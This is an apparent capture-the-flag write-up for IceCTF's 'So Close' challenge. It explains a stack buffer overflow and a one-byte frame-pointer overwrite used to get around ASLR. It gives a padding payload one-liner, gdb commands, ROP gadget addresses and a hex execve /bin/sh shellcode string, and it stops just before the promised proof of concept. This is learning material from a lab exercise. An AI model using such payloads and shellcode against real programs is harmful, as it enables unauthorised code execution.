[IceCTF] So Close – Pwn85

Challenge:

Yet so far :(
/home/so_close on the shell.

I’m starting to study pwn so this challenge took me a lot of time.
To solve this, i’ll talk about two steps:

Step 1: Figure the vulnerability

Drag so_close binary file into IDA and F5, you can see the following code

ssize_t __cdecl completely_secure(char a1)
{
  char buf; // [sp+Ch] [bp-10Ch]@1
  size_t nbytes; // [sp+10Ch] [bp-Ch]@1

  nbytes = &a1 - &buf - 4;
  puts("something something something..");
  return read(0, &buf, nbytes);
}

Yes, it read 272 bytes from our input (nbytes=a1-buf-4=bp+0x8-bp+0x10C-4=0x110=272 or you can figure it by fuzzing), we can perform the buffer overflow attack.

Let check something

ASLR is on! We have to find a clever way to solve this challenge than overwrite eip to jump back to shell address cuz the address is random.

I decided to overflow last one bit of ebp, since the address of ebp is nearly like stack address, overwrite last bit of it with \x0a (you can choose another small value) will make it jump back near the start of stack, leave instruction will mov esp,ebp then pop ebp => we can control esp => control ret.

Let debug to see if it would affect:

Choose the payload:

python -c "print 'A'*268+'\x0a'" > /tmp/tsu

debug so_close with gdb-peda:

gdb so_close

Set breakpoint at call read function:

gdb-peda$ br *0x8048467

input payload to it:

gdb-peda$ r < /tmp/tsu

So when ret instruction of totally_secure function execute, our program will jump to nearly start of the stack.

Step 2: Building payload with ROP and SHELLCODE to increase probability success

In above step, we know if we overwrite last bit of ebp with small value we can jump to nearly start of the stack, so we want it jump to one of the bunch gadget POP-RET chain with instruction JMP ESP, padding byte \x90 and shellcode. Look at this picture you will know why:

Let find address of them:

popret_gadget=0x080482d1
jmp_esp=0x0804859f

and we use this shell:

shell = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"

Finally, here the PoC: